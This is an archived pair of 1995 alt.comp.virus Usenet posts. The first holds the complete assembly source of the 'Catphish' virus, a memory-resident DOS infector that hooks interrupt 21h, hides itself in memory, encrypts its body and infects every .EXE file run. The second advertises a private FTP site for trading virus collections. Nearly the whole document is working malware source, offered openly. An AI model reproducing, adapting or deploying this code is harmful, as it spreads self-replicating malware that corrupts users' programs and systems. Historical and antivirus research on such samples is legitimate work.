mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 00:28:50 +00:00
553 lines
13 KiB
NASM
553 lines
13 KiB
NASM
|
From smtp Sun Jan 29 16:25 EST 1995
|
|||
|
Received: from ids.net by POBOX.jwu.edu; Sun, 29 Jan 95 16:25 EST
|
|||
|
Date: Sun, 29 Jan 1995 16:18:52 -0500 (EST)
|
|||
|
From: ids.net!JOSHUAW (JOSHUAW)
|
|||
|
To: pobox.jwu.edu!joshuaw
|
|||
|
Content-Length: 11874
|
|||
|
Content-Type: text
|
|||
|
Message-Id: <950129161852.10074@ids.net>
|
|||
|
Status: RO
|
|||
|
|
|||
|
To: joshuaw@pobox.jwu.edu
|
|||
|
Subject: (fwd) CATPHISH.ASM
|
|||
|
Newsgroups: alt.comp.virus
|
|||
|
|
|||
|
Path: paperboy.ids.net!uunet!cs.utexas.edu!uwm.edu!msunews!news.mtu.edu!news.mtu.edu!not-for-mail
|
|||
|
From: jdmathew@mtu.edu (Icepick)
|
|||
|
Newsgroups: alt.comp.virus
|
|||
|
Subject: CATPHISH.ASM
|
|||
|
Date: 26 Jan 1995 13:06:15 -0500
|
|||
|
Organization: Michigan Technological University
|
|||
|
Lines: 486
|
|||
|
Message-ID: <3g8oan$54g@maxwell11.ee>
|
|||
|
NNTP-Posting-Host: maxwell11.ee.mtu.edu
|
|||
|
X-Newsreader: TIN [version 1.2 PL1]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
name VIRUSTEST
|
|||
|
title
|
|||
|
code segment
|
|||
|
assume cs:code, ds:code, es:code
|
|||
|
org 100h
|
|||
|
|
|||
|
;-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
|||
|
; The Catphish Virus.
|
|||
|
;
|
|||
|
; The Catphish virus is a resident .EXE infector.
|
|||
|
; Size: 678 bytes (decimal).
|
|||
|
; No activation (bomb).
|
|||
|
; Saves date and file attributes.
|
|||
|
;
|
|||
|
; If assembling, check_if_resident jump must be marked over
|
|||
|
; with nop after first execution (first execution will hang
|
|||
|
; system).
|
|||
|
;
|
|||
|
; *** Source is made available to learn from, not to
|
|||
|
; change author's name and claim credit! ***
|
|||
|
|
|||
|
start:
|
|||
|
call setup ; Find "delta offset".
|
|||
|
setup:
|
|||
|
pop bp
|
|||
|
sub bp, offset setup-100h
|
|||
|
jmp check_if_resident ; See note above about jmp!
|
|||
|
|
|||
|
pre_dec_em:
|
|||
|
mov bx,offset infect_header-100h
|
|||
|
add bx,bp
|
|||
|
mov cx,endcrypt-infect_header
|
|||
|
|
|||
|
ror_em:
|
|||
|
mov dl,byte ptr cs:[bx]
|
|||
|
ror dl,1 ; Decrypt virus code
|
|||
|
mov byte ptr cs:[bx],dl ; by rotating right.
|
|||
|
inc bx
|
|||
|
loop ror_em
|
|||
|
|
|||
|
jmp check_if_resident
|
|||
|
|
|||
|
;--------------------------------- Infect .EXE header -----------------------
|
|||
|
; The .EXE header modifying code below is my reworked version of
|
|||
|
; Dark Angel's code found in his Phalcon/Skism virus guides.
|
|||
|
|
|||
|
|
|||
|
infect_header:
|
|||
|
push bx
|
|||
|
push dx
|
|||
|
push ax
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov bx, word ptr [buffer+8-100h] ; Header size in paragraphs
|
|||
|
; ^---make sure you don't destroy the file handle
|
|||
|
mov cl, 4 ; Multiply by 16. Won't
|
|||
|
shl bx, cl ; work with headers > 4096
|
|||
|
; bytes. Oh well!
|
|||
|
sub ax, bx ; Subtract header size from
|
|||
|
sbb dx, 0 ; file size
|
|||
|
; Now DX:AX is loaded with file size minus header size
|
|||
|
mov cx, 10h ; DX:AX/CX = AX Remainder DX
|
|||
|
div cx
|
|||
|
|
|||
|
|
|||
|
mov word ptr [buffer+14h-100h], dx ; IP Offset
|
|||
|
mov word ptr [buffer+16h-100h], ax ; CS Displacement in module
|
|||
|
|
|||
|
|
|||
|
mov word ptr [buffer+0Eh-100h], ax ; Paragraph disp. SS
|
|||
|
mov word ptr [buffer+10h-100h], 0A000h ; Starting SP
|
|||
|
|
|||
|
pop ax
|
|||
|
pop dx
|
|||
|
|
|||
|
add ax, endcode-start ; add virus size
|
|||
|
cmp ax, endcode-start
|
|||
|
jb fix_fault
|
|||
|
jmp execont
|
|||
|
|
|||
|
|
|||
|
war_cry db 'Cry Havoc, and let slip the Dogs of War!',0
|
|||
|
v_name db '[Catphish]',0 ; Virus name.
|
|||
|
v_author db 'FirstStrike',0 ; Me.
|
|||
|
v_stuff db 'Kraft!',0
|
|||
|
|
|||
|
|
|||
|
fix_fault:
|
|||
|
add dx,1d
|
|||
|
|
|||
|
execont:
|
|||
|
push ax
|
|||
|
mov cl, 9
|
|||
|
shr ax, cl
|
|||
|
ror dx, cl
|
|||
|
stc
|
|||
|
|
|||
|
adc dx, ax
|
|||
|
pop ax
|
|||
|
and ah, 1
|
|||
|
|
|||
|
|
|||
|
mov word ptr [buffer+4-100h], dx ; Fix-up the file size in
|
|||
|
mov word ptr [buffer+2-100h], ax ; the EXE header.
|
|||
|
|
|||
|
pop bx
|
|||
|
retn ; Leave subroutine
|
|||
|
|
|||
|
;----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
check_if_resident:
|
|||
|
push es
|
|||
|
xor ax,ax
|
|||
|
mov es,ax
|
|||
|
|
|||
|
cmp word ptr es:[63h*4],0040h ; Check to see if virus
|
|||
|
jnz grab_da_vectors ; is already resident
|
|||
|
jmp exit_normal ; by looking for a 40h
|
|||
|
; signature in the int 63h
|
|||
|
; offset section of
|
|||
|
; interrupt table.
|
|||
|
|
|||
|
grab_da_vectors:
|
|||
|
|
|||
|
mov ax,3521h ; Store original int 21h
|
|||
|
int 21h ; vector pointer.
|
|||
|
mov word ptr cs:[bp+dos_vector-100h],bx
|
|||
|
mov word ptr cs:[bp+dos_vector+2-100h],es
|
|||
|
|
|||
|
|
|||
|
|
|||
|
load_high:
|
|||
|
push ds
|
|||
|
|
|||
|
find_chain: ; Load high routine that
|
|||
|
; uses the DOS internal
|
|||
|
mov ah,52h ; table function to find
|
|||
|
int 21h ; start of MCB and then
|
|||
|
; scales up chain to
|
|||
|
mov ds,es: word ptr [bx-2] ; find top. (The code
|
|||
|
assume ds:nothing ; is long, but it is the
|
|||
|
; only code that would
|
|||
|
xor si,si ; work when an infected
|
|||
|
; .EXE was to be loaded
|
|||
|
Middle_check: ; into memory.
|
|||
|
|
|||
|
cmp byte ptr ds:[0],'M'
|
|||
|
jne Check4last
|
|||
|
|
|||
|
add_one:
|
|||
|
mov ax,ds
|
|||
|
add ax,ds:[3]
|
|||
|
inc ax
|
|||
|
|
|||
|
mov ds,ax
|
|||
|
jmp Middle_check
|
|||
|
|
|||
|
Check4last:
|
|||
|
cmp byte ptr ds:[0],'Z'
|
|||
|
jne Error
|
|||
|
mov byte ptr ds:[0],'M'
|
|||
|
sub word ptr ds:[3],(endcode-start+15h)/16h+1
|
|||
|
jmp add_one
|
|||
|
|
|||
|
error:
|
|||
|
mov byte ptr ds:[0],'Z'
|
|||
|
mov word ptr ds:[1],008h
|
|||
|
mov word ptr ds:[3],(endcode-start+15h)/16h+1
|
|||
|
|
|||
|
push ds
|
|||
|
pop ax
|
|||
|
inc ax
|
|||
|
push ax
|
|||
|
pop es
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
move_virus_loop:
|
|||
|
mov bx,offset start-100h ; Move virus into carved
|
|||
|
add bx,bp ; out location in memory.
|
|||
|
mov cx,endcode-start
|
|||
|
push bp
|
|||
|
mov bp,0000h
|
|||
|
|
|||
|
move_it:
|
|||
|
mov dl, byte ptr cs:[bx]
|
|||
|
mov byte ptr es:[bp],dl
|
|||
|
inc bp
|
|||
|
inc bx
|
|||
|
loop move_it
|
|||
|
pop bp
|
|||
|
|
|||
|
|
|||
|
|
|||
|
hook_vectors:
|
|||
|
|
|||
|
mov ax,2563h ; Hook the int 21h vector
|
|||
|
mov dx,0040h ; which means it will
|
|||
|
int 21h ; point to virus code in
|
|||
|
; memory.
|
|||
|
mov ax,2521h
|
|||
|
mov dx,offset virus_attack-100h
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
int 21h
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
pop ds
|
|||
|
|
|||
|
|
|||
|
|
|||
|
exit_normal: ; Return control to
|
|||
|
pop es ; infected .EXE
|
|||
|
mov ax, es ; (Dark Angle code.)
|
|||
|
add ax, 10h
|
|||
|
add word ptr cs:[bp+OrigCSIP+2-100h], ax
|
|||
|
|
|||
|
cli
|
|||
|
add ax, word ptr cs:[bp+OrigSSSP+2-100h]
|
|||
|
mov ss, ax
|
|||
|
mov sp, word ptr cs:[bp+OrigSSSP-100h]
|
|||
|
sti
|
|||
|
|
|||
|
xor ax,ax
|
|||
|
xor bp,bp
|
|||
|
|
|||
|
endcrypt label byte
|
|||
|
|
|||
|
db 0eah
|
|||
|
OrigCSIP dd 0fff00000h
|
|||
|
OrigSSSP dd ?
|
|||
|
|
|||
|
exe_attrib dw ?
|
|||
|
date_stamp dw ?
|
|||
|
time_stamp dw ?
|
|||
|
|
|||
|
|
|||
|
|
|||
|
dos_vector dd ?
|
|||
|
|
|||
|
buffer db 18h dup(?) ; .EXE header buffer.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
virus_attack proc far
|
|||
|
assume cs:code,ds:nothing, es:nothing
|
|||
|
|
|||
|
|
|||
|
cmp ax,4b00h ; Infect only on file
|
|||
|
jz run_kill ; executions.
|
|||
|
|
|||
|
leave_virus:
|
|||
|
jmp dword ptr cs:[dos_vector-100h]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
run_kill:
|
|||
|
call infectexe
|
|||
|
jmp leave_virus
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
infectexe: ; Same old working horse
|
|||
|
push ax ; routine that infects
|
|||
|
push bx ; the selected file.
|
|||
|
push cx
|
|||
|
push es
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov cx,64d
|
|||
|
mov bx,dx
|
|||
|
|
|||
|
findname:
|
|||
|
cmp byte ptr ds:[bx],'.'
|
|||
|
jz o_k
|
|||
|
inc bx
|
|||
|
loop findname
|
|||
|
|
|||
|
pre_get_out:
|
|||
|
jmp get_out
|
|||
|
|
|||
|
o_k:
|
|||
|
cmp byte ptr ds:[bx+1],'E' ; Searches for victims.
|
|||
|
jnz pre_get_out
|
|||
|
cmp byte ptr ds:[bx+2],'X'
|
|||
|
jnz pre_get_out
|
|||
|
cmp byte ptr ds:[bx+3],'E'
|
|||
|
jnz pre_get_out
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
getexe:
|
|||
|
mov ax,4300h
|
|||
|
call dosit
|
|||
|
|
|||
|
mov word ptr cs:[exe_attrib-100h],cx
|
|||
|
|
|||
|
mov ax,4301h
|
|||
|
xor cx,cx
|
|||
|
call dosit
|
|||
|
|
|||
|
exe_kill:
|
|||
|
mov ax,3d02h
|
|||
|
call dosit
|
|||
|
xchg bx,ax
|
|||
|
|
|||
|
mov ax,5700h
|
|||
|
call dosit
|
|||
|
|
|||
|
mov word ptr cs:[time_stamp-100h],cx
|
|||
|
mov word ptr cs:[date_stamp-100h],dx
|
|||
|
|
|||
|
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov ah,3fh
|
|||
|
mov cx,18h
|
|||
|
mov dx,offset buffer-100h
|
|||
|
call dosit
|
|||
|
|
|||
|
cmp word ptr cs:[buffer+12h-100h],1993h ; Looks for virus marker
|
|||
|
jnz infectforsure ; of 1993h in .EXE
|
|||
|
jmp close_it ; header checksum
|
|||
|
; position.
|
|||
|
infectforsure:
|
|||
|
call move_f_ptrfar
|
|||
|
|
|||
|
push ax
|
|||
|
push dx
|
|||
|
|
|||
|
|
|||
|
call store_header
|
|||
|
|
|||
|
pop dx
|
|||
|
pop ax
|
|||
|
|
|||
|
call infect_header
|
|||
|
|
|||
|
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
|
|||
|
|
|||
|
mov bx,offset infect_header-100h
|
|||
|
mov cx,(endcrypt)-(infect_header)
|
|||
|
|
|||
|
rol_em: ; Encryption via
|
|||
|
mov dl,byte ptr cs:[bx] ; rotating left.
|
|||
|
rol dl,1
|
|||
|
mov byte ptr cs:[bx],dl
|
|||
|
inc bx
|
|||
|
loop rol_em
|
|||
|
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
|
|||
|
mov ah,40h
|
|||
|
mov cx,endcode-start
|
|||
|
mov dx,offset start-100h
|
|||
|
call dosit
|
|||
|
|
|||
|
|
|||
|
mov word ptr cs:[buffer+12h-100h],1993h
|
|||
|
|
|||
|
|
|||
|
call move_f_ptrclose
|
|||
|
|
|||
|
mov ah,40h
|
|||
|
mov cx,18h
|
|||
|
mov dx,offset buffer-100h
|
|||
|
call dosit
|
|||
|
|
|||
|
mov ax,5701h
|
|||
|
mov cx,word ptr cs:[time_stamp-100h]
|
|||
|
mov dx,word ptr cs:[date_stamp-100h]
|
|||
|
call dosit
|
|||
|
|
|||
|
close_it:
|
|||
|
|
|||
|
|
|||
|
mov ah,3eh
|
|||
|
call dosit
|
|||
|
|
|||
|
get_out:
|
|||
|
|
|||
|
|
|||
|
pop ds
|
|||
|
pop dx
|
|||
|
|
|||
|
set_attrib:
|
|||
|
mov ax,4301h
|
|||
|
mov cx,word ptr cs:[exe_attrib-100h]
|
|||
|
call dosit
|
|||
|
|
|||
|
|
|||
|
pop es
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
|
|||
|
retn
|
|||
|
|
|||
|
;---------------------------------- Call to DOS int 21h ---------------------
|
|||
|
|
|||
|
dosit: ; DOS function call code.
|
|||
|
pushf
|
|||
|
call dword ptr cs:[dos_vector-100h]
|
|||
|
retn
|
|||
|
|
|||
|
;----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;-------------------------------- Store Header -----------------------------
|
|||
|
|
|||
|
store_header:
|
|||
|
les ax, dword ptr [buffer+14h-100h] ; Save old entry point
|
|||
|
mov word ptr [OrigCSIP-100h], ax
|
|||
|
mov word ptr [OrigCSIP+2-100h], es
|
|||
|
|
|||
|
les ax, dword ptr [buffer+0Eh-100h] ; Save old stack
|
|||
|
mov word ptr [OrigSSSP-100h], es
|
|||
|
mov word ptr [OrigSSSP+2-100h], ax
|
|||
|
|
|||
|
retn
|
|||
|
|
|||
|
;---------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;---------------------------------- Set file pointer ------------------------
|
|||
|
|
|||
|
move_f_ptrfar: ; Code to move file pointer.
|
|||
|
mov ax,4202h
|
|||
|
jmp short move_f
|
|||
|
|
|||
|
move_f_ptrclose:
|
|||
|
mov ax,4200h
|
|||
|
|
|||
|
move_f:
|
|||
|
xor dx,dx
|
|||
|
xor cx,cx
|
|||
|
call dosit
|
|||
|
retn
|
|||
|
|
|||
|
;----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
endcode label byte
|
|||
|
|
|||
|
endp
|
|||
|
|
|||
|
code ends
|
|||
|
end start
|
|||
|
|
|||
|
From smtp Fri Jan 27 13:23 EST 1995
|
|||
|
Received: from ids.net by POBOX.jwu.edu; Fri, 27 Jan 95 13:23 EST
|
|||
|
Date: Fri, 27 Jan 1995 13:21:38 -0500 (EST)
|
|||
|
From: ids.net!JOSHUAW (JOSHUAW)
|
|||
|
To: pobox.jwu.edu!joshuaw
|
|||
|
Content-Length: 1179
|
|||
|
Content-Type: binary
|
|||
|
Message-Id: <950127132138.b52b@ids.net>
|
|||
|
Status: RO
|
|||
|
|
|||
|
To: joshuaw@pobox.jwu.edu
|
|||
|
Subject: (fwd) Private Virii FTP Site
|
|||
|
Newsgroups: alt.comp.virus
|
|||
|
|
|||
|
Path: paperboy.ids.net!uunet!nntp.crl.com!crl12.crl.com!not-for-mail
|
|||
|
From: yojimbo@crl.com (Douglas Mauldin)
|
|||
|
Newsgroups: alt.comp.virus
|
|||
|
Subject: Private Virii FTP Site
|
|||
|
Date: 24 Jan 1995 22:01:53 -0800
|
|||
|
Organization: CRL Dialup Internet Access (415) 705-6060 [Login: guest]
|
|||
|
Lines: 14
|
|||
|
Message-ID: <3g4pgh$ka2@crl12.crl.com>
|
|||
|
NNTP-Posting-Host: crl12.crl.com
|
|||
|
X-Newsreader: TIN [version 1.2 PL2]
|
|||
|
|
|||
|
I run THe QUaRaNTiNE, a private FTP site for viral reseachers/coders. I'm
|
|||
|
always on the lookout for new viral material. If you'd like access, or
|
|||
|
like to trade, email me a list of your collection.
|
|||
|
|
|||
|
Serious inquiries only.
|
|||
|
|
|||
|
<EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD>-<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>- - <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-- <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>- <EFBFBD><EFBFBD>-<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<EFBFBD> Yojimbo [<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>] <EFBFBD> Fast as the Wind <EFBFBD>
|
|||
|
<EFBFBD> SysOp: The Dojo BBS <EFBFBD> Quiet as the Forest <EFBFBD>
|
|||
|
<EFBFBD> 1.7i3.436.1795 <EFBFBD> Aggressive as Fire <EFBFBD>
|
|||
|
<EFBFBD> QUaRaNTiNE HomeSite <EFBFBD> And <EFBFBD>
|
|||
|
<EFBFBD> THe ULTiMaTE ViRaL InFeCTiON <EFBFBD> Immovable as a Mountain <EFBFBD>
|
|||
|
<EFBFBD><EFBFBD> -<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
|